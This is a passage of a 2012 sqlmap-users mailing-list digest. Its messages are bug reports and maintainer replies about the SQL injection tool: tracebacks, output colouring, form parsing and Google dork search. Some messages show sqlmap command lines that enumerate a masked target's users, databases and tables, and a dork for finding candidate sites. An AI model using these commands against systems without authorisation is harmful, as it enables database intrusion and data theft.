https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 11 > Date: Sun, 05 Aug 2012 14:06:55 +0400 > From: Happy User <rob...@gm...> > Subject: [sqlmap-users] MemoryError > To: sql...@li... > Message-ID: <501...@gm...> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > [*] starting at 14:00:21 > > [14:00:22] [INFO] testing connection to the target url > [14:00:23] [INFO] testing if the url is stable, wait a few seconds > [14:00:24] [INFO] url is stable > [14:00:24] [INFO] testing if GET parameter 'block' is dynamic > [14:00:25] [INFO] confirming that GET parameter 'block' is dynamic > [14:00:27] [INFO] GET parameter 'block' is dynamic > [14:00:36] [WARNING] large response detected. This could take a while > > [14:02:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b483710, > retry your run with the latest development version from the G > itHub repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. Th > e developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 1.0-dev-b483710 > Python version: 2.7.3 > Operating system: nt > Command line: D:\Soft\sqlmap-dev\sqlmap.py -u > ************************************ --current-user --current-db > --is-dba --tables - > -dbs -c bulk > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > start() > File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 458, in > start > check = heuristicCheckSqlInjection(place, parameter) > File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 627, in > heuristicCheckSqlInjection > page, _ = Request.queryPage(payload, place, content=True, > raise404=False) > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 732, in queryPage > page, headers, code = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, host=host, silent=si > lent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCompare) > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 498, in getPage > page = page if isinstance(page, unicode) else getUnicode(page) > File "D:\Soft\sqlmap-dev\lib\core\common.py", line 1861, in getUnicode > return unicode(value, UNICODE_ENCODING, "replace") > File "C:\Python27\lib\encodings\utf_8.py", line 16, in decode > return codecs.utf_8_decode(input, errors, True) > MemoryError > > [*] shutting down at 14:02:56 > > > > ------------------------------ > > Message: 12 > Date: Tue, 7 Aug 2012 00:01:31 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] sqlmap error > To: D Atkin <je...@ho...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > Metasploit's module sqlmap(.rb) is obsolete. > > Kind regards, > Miroslav Stampar > > On Fri, Aug 3, 2012 at 6:37 PM, D Atkin <je...@ho...> wrote: > > > hi > > > > im try to run sqlmap from msf but i keep getting this error > > > > the sqlmap script could not be found: > > > > iv already had sqlmap path to system Path envirounment put im still > > getting this error. > > > > can u tell me what i can do from here. > > > > Thank you! > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 13 > Date: Tue, 7 Aug 2012 00:54:32 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] MemoryError > To: Happy User <rob...@gm...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > This should be "patched" now [1], but nevertheless, it's interesting that > you are getting such large response immediately in such early phase. If you > don't mind you could send me more info privately. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/139 > > On Sun, Aug 5, 2012 at 12:06 PM, Happy User <rob...@gm...>wrote: > > > [*] starting at 14:00:21 > > > > [14:00:22] [INFO] testing connection to the target url > > [14:00:23] [INFO] testing if the url is stable, wait a few seconds > > [14:00:24] [INFO] url is stable > > [14:00:24] [INFO] testing if GET parameter 'block' is dynamic > > [14:00:25] [INFO] confirming that GET parameter 'block' is dynamic > > [14:00:27] [INFO] GET parameter 'block' is dynamic > > [14:00:36] [WARNING] large response detected. This could take a while > > > > [14:02:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b483710, > > retry your run with the latest development version from the G > > itHub repository. If the exception persists, please send by e-mail to > > 'sql...@li...' or open a new issue at > > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following > > text and any information required to reproduce the bug. Th > > e developers will try to reproduce the bug, fix it accordingly and get > > back to you. > > sqlmap version: 1.0-dev-b483710 > > Python version: 2.7.3 > > Operating system: nt > > Command line: D:\Soft\sqlmap-dev\sqlmap.py -u > > ************************************ --current-user --current-db > > --is-dba --tables - > > -dbs -c bulk > > Technique: None > > Back-end DBMS: None (identified) > > Traceback (most recent call last): > > File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > > start() > > File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 458, in > > start > > check = heuristicCheckSqlInjection(place, parameter) > > File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 627, in > > heuristicCheckSqlInjection > > page, _ = Request.queryPage(payload, place, content=True, > > raise404=False) > > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 732, in queryPage > > page, headers, code = Connect.getPage(url=uri, get=get, post=post, > > cookie=cookie, ua=ua, referer=referer, host=host, silent=si > > lent, method=method, auxHeaders=auxHeaders, response=response, > > raise404=raise404, ignoreTimeout=timeBasedCompare) > > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 498, in getPage > > page = page if isinstance(page, unicode) else getUnicode(page) > > File "D:\Soft\sqlmap-dev\lib\core\common.py", line 1861, in getUnicode > > return unicode(value, UNICODE_ENCODING, "replace") > > File "C:\Python27\lib\encodings\utf_8.py", line 16, in decode > > return codecs.utf_8_decode(input, errors, True) > > MemoryError > > > > [*] shutting down at 14:02:56 > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 14 > Date: Tue, 7 Aug 2012 14:24:35 +1000 > From: Peter Thomas <pe...@ha...> > Subject: Re: [sqlmap-users] Disable output coloring > To: sql...@li... > Message-ID: > <CAH...@ma...> > Content-Type: text/plain; charset=UTF-8 > > I agree that it would be handy to have a way to disable the color output. > > We also output to text for sending in our automated email reports. > > The other alternative is to use sed. > > sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" > > > -- > Regards, > > Peter > -------------------------------------------------- > Security Scanning Tools On-line > Web: http://hackertarget.com/ > -------------------------------------------------- > > > [sqlmap-users] Disable output coloring > > From: M Zverev <roberthacksley@gm...> - 2012-08-02 11:18 > > > > I often redirect sqlmap output to a text file with the command >, and > > that leave annoying marks like > > [0m > > > > > [31m > > at the beginning and the end of lines, and I have to clean that out. > > Is there a way to disable output coloring? > > > > > > > ------------------------------ > > Message: 15 > Date: Tue, 7 Aug 2012 10:59:10 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Disable output coloring > To: Peter Thomas <pe...@ha...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > This should be fixed now [1]. sqlmap should handle this recognition of > redirected output automatically from now on. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/140 > > On Tue, Aug 7, 2012 at 6:24 AM, Peter Thomas <pe...@ha...> wrote: > > > I agree that it would be handy to have a way to disable the color output. > > > > We also output to text for sending in our automated email reports. > > > > The other alternative is to use sed. > > > > sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" > > > > > > -- > > Regards, > > > > Peter > > -------------------------------------------------- > > Security Scanning Tools On-line > > Web: http://hackertarget.com/ > > -------------------------------------------------- > > > > > [sqlmap-users] Disable output coloring > > > From: M Zverev <roberthacksley@gm...> - 2012-08-02 11:18 > > > > > > I often redirect sqlmap output to a text file with the command >, and > > > that leave annoying marks like > > > [0m > > > > > > > > [31m > > > at the beginning and the end of lines, and I have to clean that out. > > > Is there a way to disable output coloring? > > > > > > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 16 > Date: Tue, 7 Aug 2012 22:25:42 +1000 > From: Peter Thomas <pe...@ha...> > Subject: Re: [sqlmap-users] Disable output coloring > To: Miroslav Stampar <mir...@gm...> > Cc: sql...@li... > Message-ID: > <CAH...@ma...> > Content-Type: text/plain; charset=UTF-8 > > Thanks Miroslav, > > Feature / bug fix completed in under 4hours. Nice work! > > > On Tue, Aug 7, 2012 at 6:59 PM, Miroslav Stampar > <mir...@gm...> wrote: > > Hi. > > > > This should be fixed now [1]. sqlmap should handle this recognition of > > redirected output automatically from now on. > > > > Kind regards, > > Miroslav Stampar > > > > [1] https://github.com/sqlmapproject/sqlmap/issues/140 > > > > On Tue, Aug 7, 2012 at 6:24 AM, Peter Thomas <pe...@ha...> wrote: > > > > > > I agree that it would be handy to have a way to disable the color output. > > > > > > We also output to text for sending in our automated email reports. > > > > > > The other alternative is to use sed. > > > > > > sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" > > > > > > > > > -- > > > Regards, > > > > > > Peter > > > -------------------------------------------------- > > > Security Scanning Tools On-line > > > Web: http://hackertarget.com/ > > > -------------------------------------------------- > > > > > > > [sqlmap-users] Disable output coloring > > > > From: M Zverev <roberthacksley@gm...> - 2012-08-02 11:18 > > > > > > > > I often redirect sqlmap output to a text file with the command >, and > > > > that leave annoying marks like > > > > [0m > > > > > > > > > > > [31m > > > > at the beginning and the end of lines, and I have to clean that out. > > > > Is there a way to disable output coloring? > > > > > > > > > > > > > > > > ------------------------------------------------------------------------------ > > > Live Security Virtual Conference > > > Exclusive live event will cover all the ways today's security and > > > threat landscape has changed and how IT managers can respond. Discussions > > > will include endpoint security, mobile security and the latest in malware > > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > > > sqlmap-users mailing list > > > sql...@li... > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > > > -- > Regards, > > Peter > -------------------------------------------------- > Security Scanning Tools On-line > Web: http://hackertarget.com/ > -------------------------------------------------- > > > > ------------------------------ > > Message: 17 > Date: Fri, 3 Aug 2012 17:27:30 -0700 (PDT) > From: muhammad husaini harun <hus...@ya...> > Subject: [sqlmap-users] ask error in sqlmap > To: "sql...@li..." > <sql...@li...> > Message-ID: > <134...@we...> > Content-Type: text/plain; charset="iso-8859-1" > > hello i get error when scan using sqlmap? > > [08:17:12] [CRITICAL] all parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing a valid value for option '--regexp' as perhaps the regular expression that you have choosen does not match exclusively True responses > > [*] shutting down at 08:17:12 > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 18 > Date: Wed, 8 Aug 2012 10:15:09 -0500 > From: Brandon Perry <bpe...@gm...> > Subject: Re: [sqlmap-users] ask error in sqlmap > To: muhammad husaini harun <hus...@ya...> > Cc: "sql...@li..." > <sql...@li...> > Message-ID: > <CAO...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > This isn't an error. It is telling you all params in the query are not > injectable. > On Aug 8, 2012 9:48 AM, "muhammad husaini harun" <hus...@ya...> wrote: > > > hello i get error when scan using sqlmap > > > > [08:17:12] [CRITICAL] all parameters appear to be not injectable. Try to > > increase '--level'/'--risk' values to perform more tests. Also, you can try > > to rerun by providing a valid value for option '--regexp' as perhaps the > > regular expression that you have choosen does not match exclusively True > > responses > > > > [*] shutting down at 08:17:12 > > > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 19 > Date: Thu, 9 Aug 2012 09:53:19 +0200 > From: Marco Mirandola <mm...@gm...> > Subject: [sqlmap-users] tag FORM not supported > To: sql...@li... > Message-ID: > <CACzG1hLQgfSvsRdCqpsM_ekg0qJHsSkRr0msM6iyf4hYJr_=mQ...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi Sqlmap team :-) > > This is the error: > > ===================================================================== > [09:40:35] [INFO] testing connection to the target url > [09:40:36] [INFO] searching for forms > [09:40:37] [CRITICAL] there has been a problem while processing page forms > ('unk > nown GET form encoding type 'multipart/form-data'') > ===================================================================== > > And this is the stub of html page > ===================================================================== > > <form name="choice" enctype="multipart/form-data" method="GET" > action="/result.php" style="display:inline;"> > <select style="margin-bottom:10px;" name="categoria" id="categoria"> > <option value="">Tutti</option> > <option selected="selected" >Coppie</option> > <option value="a">a</option> > <option value="b">b</option> > <option value="c">c</option> > <option value="d">d</option> > <option >e</option> > <option >f</option> > <option >g</option> > <option >h</option> > <option value="i">i</option> > </select> > <br> > <select name="regione" id="regione" style="margin-top:8px; > margin-bottom:8px;"> > <option selected="selected"></option> > <option></option> > <option value="Abruzzo" >Abruzzo</option> > <option value="Basilicata" >Basilicata</option> > <option value="Calabria" >Calabria</option> > <option value="Campania" >Campania</option> > <option value="Emilia Romagna" >Emilia Romagna</option> > <option value="Friuli" >Friuli</option> > <option value="Lazio">Lazio</option> > <option value="Liguria" >Liguria</option> > <option value="Lombardia" >Lombardia</option> > <option value="Marche" >Marche</option> > <option value="Molise" >Molise</option> > <option value="Piemonte" >Piemonte</option> > <option value="Puglia" >Puglia</option> > <option value="Sardegna" >Sardegna</option> > <option value="Sicilia" >Sicilia</option> > <option value="Toscana" >Toscana</option> > <option value="Trentino" >Trentino</option> > <option value="Umbria" >Umbria</option> > <option value="ValleAosta" >Valle d'Aosta</option> > <option value="Veneto" >Veneto</option> > <option value="estero" >...all'estero</option> > </select><br /> > <input name="check1" type="checkbox" value="1" /> > <input name="check1" type="checkbox" value="1" /> > <input name="check1" type="checkbox" value="1" /> > <br /> > <input type="Image" name="Invia" img src=" > http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/img/go.gif" > width="55" height="19"> > </div> > </form> > > ===================================================================== > > Best regards > > Marco Mirandola > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 20 > Date: Thu, 9 Aug 2012 16:06:59 +0800 > From: Timon Wang <tim...@gm...> > Subject: Re: [sqlmap-users] tag FORM not supported > To: Marco Mirandola <mm...@gm...> > Cc: sql...@li... > Message-ID: > <CAH+8Fsw5jKctkXP77EkR7ZH93Uy6Gb1e=HOd-k=Z_z...@ma...> > Content-Type: text/plain; charset=ISO-8859-1 > > So special... > Form method is get ,and enctype equals multipart/form-data. That's not > a valid form, you can't use this to upload file or submit data I > think. > > On Thu, Aug 9, 2012 at 3:53 PM, Marco Mirandola <mm...@gm...> wrote: > > Hi Sqlmap team :-) > > > > This is the error: > > > > ===================================================================== > > [09:40:35] [INFO] testing connection to the target url > > [09:40:36] [INFO] searching for forms > > [09:40:37] [CRITICAL] there has been a problem while processing page forms > > ('unk > > nown GET form encoding type 'multipart/form-data'') > > ===================================================================== > > > > And this is the stub of html page > > ===================================================================== > > > > <form name="choice" enctype="multipart/form-data" method="GET" > > action="/result.php" style="display:inline;"> > > <select style="margin-bottom:10px;" name="categoria" id="categoria"> > > <option value="">Tutti</option> > > <option selected="selected" >Coppie</option> > > <option value="a">a</option> > > <option value="b">b</option> > > <option value="c">c</option> > > <option value="d">d</option> > > <option >e</option> > > <option >f</option> > > <option >g</option> > > <option >h</option> > > <option value="i">i</option> > > </select> > > <br> > > <select name="regione" id="regione" style="margin-top:8px; > > margin-bottom:8px;"> > > <option selected="selected"></option> > > <option></option> > > <option value="Abruzzo" >Abruzzo</option> > > <option value="Basilicata" >Basilicata</option> > > <option value="Calabria" >Calabria</option> > > <option value="Campania" >Campania</option> > > <option value="Emilia Romagna" >Emilia Romagna</option> > > <option value="Friuli" >Friuli</option> > > <option value="Lazio">Lazio</option> > > <option value="Liguria" >Liguria</option> > > <option value="Lombardia" >Lombardia</option> > > <option value="Marche" >Marche</option> > > <option value="Molise" >Molise</option> > > <option value="Piemonte" >Piemonte</option> > > <option value="Puglia" >Puglia</option> > > <option value="Sardegna" >Sardegna</option> > > <option value="Sicilia" >Sicilia</option> > > <option value="Toscana" >Toscana</option> > > <option value="Trentino" >Trentino</option> > > <option value="Umbria" >Umbria</option> > > <option value="ValleAosta" >Valle d'Aosta</option> > > <option value="Veneto" >Veneto</option> > > <option value="estero" >...all'estero</option> > > </select><br /> > > <input name="check1" type="checkbox" value="1" /> > > <input name="check1" type="checkbox" value="1" /> > > <input name="check1" type="checkbox" value="1" /> > > <br /> > > <input type="Image" name="Invia" img > > src="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/img/go.gif" > > width="55" height="19"> > > </div> > > </form> > > > > ===================================================================== > > > > Best regards > > > > Marco Mirandola > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Focus on: Network security,Scanner,NodeJS,JAVA,WWW > Blog: http://www.nohouse.net > > > > ------------------------------ > > Message: 21 > Date: Thu, 9 Aug 2012 11:33:55 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] tag FORM not supported > To: Timon Wang <tim...@gm...> > Cc: sql...@li... > Message-ID: > <CA+9yoX0y5=K2qzgUhDgGCpQrh=V679WVrP=y8c...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi all. > > Timon is right. I don't have anything more to say. > > Kind regards, > Miroslav Stampar > > On Thu, Aug 9, 2012 at 10:06 AM, Timon Wang <tim...@gm...> wrote: > > > So special... > > Form method is get ,and enctype equals multipart/form-data. That's not > > a valid form, you can't use this to upload file or submit data I > > think. > > > > On Thu, Aug 9, 2012 at 3:53 PM, Marco Mirandola <mm...@gm...> wrote: > > > Hi Sqlmap team :-) > > > > > > This is the error: > > > > > > ===================================================================== > > > [09:40:35] [INFO] testing connection to the target url > > > [09:40:36] [INFO] searching for forms > > > [09:40:37] [CRITICAL] there has been a problem while processing page > > > > > > > forms > > > ('unk > > > nown GET form encoding type 'multipart/form-data'') > > > ===================================================================== > > > > > > And this is the stub of html page > > > ===================================================================== > > > > > > <form name="choice" enctype="multipart/form-data" method="GET" > > > action="/result.php" style="display:inline;"> > > > <select style="margin-bottom:10px;" name="categoria" id="categoria"> > > > <option value="">Tutti</option> > > > <option selected="selected" >Coppie</option> > > > <option value="a">a</option> > > > <option value="b">b</option> > > > <option value="c">c</option> > > > <option value="d">d</option> > > > <option >e</option> > > > <option >f</option> > > > <option >g</option> > > > <option >h</option> > > > <option value="i">i</option> > > > </select> > > > <br> > > > <select name="regione" id="regione" style="margin-top:8px; > > > margin-bottom:8px;"> > > > <option selected="selected"></option> > > > <option></option> > > > <option value="Abruzzo" >Abruzzo</option> > > > <option value="Basilicata" >Basilicata</option> > > > <option value="Calabria" >Calabria</option> > > > <option value="Campania" >Campania</option> > > > <option value="Emilia Romagna" >Emilia Romagna</option> > > > <option value="Friuli" >Friuli</option> > > > <option value="Lazio">Lazio</option> > > > <option value="Liguria" >Liguria</option> > > > <option value="Lombardia" >Lombardia</option> > > > <option value="Marche" >Marche</option> > > > <option value="Molise" >Molise</option> > > > <option value="Piemonte" >Piemonte</option> > > > <option value="Puglia" >Puglia</option> > > > <option value="Sardegna" >Sardegna</option> > > > <option value="Sicilia" >Sicilia</option> > > > <option value="Toscana" >Toscana</option> > > > <option value="Trentino" >Trentino</option> > > > <option value="Umbria" >Umbria</option> > > > <option value="ValleAosta" >Valle d'Aosta</option> > > > <option value="Veneto" >Veneto</option> > > > <option value="estero" >...all'estero</option> > > > </select><br /> > > > <input name="check1" type="checkbox" value="1" /> > > > <input name="check1" type="checkbox" value="1" /> > > > <input name="check1" type="checkbox" value="1" /> > > > <br /> > > > <input type="Image" name="Invia" img > > > src=" > > > > > > > http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/img/go.gif > > " > > > width="55" height="19"> > > > </div> > > > </form> > > > > > > ===================================================================== > > > > > > Best regards > > > > > > Marco Mirandola > > ------------------------------------------------------------------------------ > > > Live Security Virtual Conference > > > Exclusive live event will cover all the ways today's security and > > > threat landscape has changed and how IT managers can respond. Discussions > > > will include endpoint security, mobile security and the latest in malware > > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > > > sqlmap-users mailing list > > > sql...@li... > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > > > -- > > Focus on: Network security,Scanner,NodeJS,JAVA,WWW > > Blog: http://www.nohouse.net > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 22 > Date: Thu, 9 Aug 2012 12:23:47 +0200 > From: Marco Mirandola <mm...@gm...> > Subject: Re: [sqlmap-users] tag FORM not supported > To: Miroslav Stampar <mir...@gm...> > Cc: sql...@li... > Message-ID: > <CACzG1h+fNw5PMZ+=4fw...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > But rather than check enctype = "multipart / form-data", which in my case > does not include any upload (see attached html), because not only excludes > only the possible upload? > we are in the attached example: > > 2 select (combobox) > 3 checkboxes > > both valid for the injection ... > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 23 > Date: Thu, 9 Aug 2012 11:42:03 +0100 > From: Chris Oakley <chr...@gm...> > Subject: Re: [sqlmap-users] tag FORM not supported > To: Marco Mirandola <mm...@gm...> > Cc: sql...@li... > Message-ID: > <CAF6VE=oG1c5TSXvAN6C6SXyLkMHLXTqFRWju=qe_...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Even though it's wrong to use GET with this enctype, I think it will still > work: > > http://oi49.tinypic.com/2yn2r9w.jpg > > So if this is interacting with a database, there could still be an > injection. Perhaps the check that sqlmap does is too simplistic? > > Regards > > Chris > > On 9 August 2012 11:23, Marco Mirandola <mm...@gm...> wrote: > > > But rather than check enctype = "multipart / form-data", which in my case > > does not include any upload (see attached html), because not only excludes > > only the possible upload? > > we are in the attached example: > > > > 2 select (combobox) > > 3 checkboxes > > > > both valid for the injection ... > > > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 24 > Date: Thu, 9 Aug 2012 13:48:45 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] tag FORM not supported > To: Chris Oakley <chr...@gm...> > Cc: sql...@li... > Message-ID: > <CA+9yoX2EX-Gx9Ji_JCDaa_dpxzMfLNymQh-t3__CQSUArr-=9w...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > This is solely coming from a 3rd party library ClientForm [1] and we don't > like to change anything inside those. Nevertheless, find it "patched" with > the latest commit [2]. > > Kind regards, > Miroslav Stampar > > [1] http://pypi.python.org/pypi/ClientForm/0.2.10 > [2] https://github.com/sqlmapproject/sqlmap/issues/143 > > On Thu, Aug 9, 2012 at 12:42 PM, Chris Oakley > <chr...@gm...>wrote: > > > Even though it's wrong to use GET with this enctype, I think it will still > > work: > > > > http://oi49.tinypic.com/2yn2r9w.jpg > > > > So if this is interacting with a database, there could still be an > > injection. Perhaps the check that sqlmap does is too simplistic? > > > > Regards > > > > Chris > > > > On 9 August 2012 11:23, Marco Mirandola <mm...@gm...> wrote: > > > > > But rather than check enctype = "multipart / form-data", which in my case > > > does not include any upload (see attached html), because not only excludes > > > only the possible upload? > > > we are in the attached example: > > > > > > 2 select (combobox) > > > 3 checkboxes > > > > > > both valid for the injection ... > > > > > > > > > > > > ------------------------------------------------------------------------------ > > > Live Security Virtual Conference > > > Exclusive live event will cover all the ways today's security and > > > threat landscape has changed and how IT managers can respond. Discussions > > > will include endpoint security, mobile security and the latest in malware > > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > > > sqlmap-users mailing list > > > sql...@li... > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 25 > Date: Thu, 16 Aug 2012 12:35:25 +0700 > From: root rieqy <roo...@gm...> > Subject: [sqlmap-users] Rieqy Erysya > To: sql...@li... > Message-ID: > <CAN...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hello sqlmap team :D > i had download new version of sqlmap(sqlmap version 1.0) > and i have always get error when every i write : > [code]F:\sqlmap>sqlmap.py -g "inurl:view.php?id=23"[/code] > it syntax giving error like this: > [code][12:21:35] [CRITICAL] unable to find results for your Google dork > expression[/code] > > why it happened ? whereas I've download new version of sqlmap > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 26 > Date: Thu, 16 Aug 2012 11:33:24 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Rieqy Erysya > To: root rieqy <roo...@gm...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > Find it fixed now [1]. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/59 > > On Thu, Aug 16, 2012 at 7:35 AM, root rieqy <roo...@gm...> wrote: > > > Hello sqlmap team :D > > i had download new version of sqlmap(sqlmap version 1.0) > > and i have always get error when every i write : > > [code]F:\sqlmap>sqlmap.py -g "inurl:view.php?id=23"[/code] > > it syntax giving error like this: > > [code][12:21:35] [CRITICAL] unable to find results for your Google dork > > expression[/code] > > > > why it happened ? whereas I've download new version of sqlmap > > > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 27 > Date: Fri, 17 Aug 2012 14:10:53 +0200 > From: Sergio Molina <sm...@wp...> > Subject: [sqlmap-users] Anyone having trouble with --eval? > To: sql...@li... > Message-ID: > <CAF...@ma...> > Content-Type: text/plain; charset="windows-1252" > > Hi there > > Just downloaded latest dev version (actually I did yesterday). I am having > trouble with --eval, sqlmap complains when running evaluateCode with > modified parameters (something like pincode=abc123'' stuff). More > precisely, the following lines in lib/request/connect.py: > > for part in item.split(delimiter): > if '=' in part: > name, value = part.split('=', 1) > evaluateCode(?%s='%s'? % (name, value), 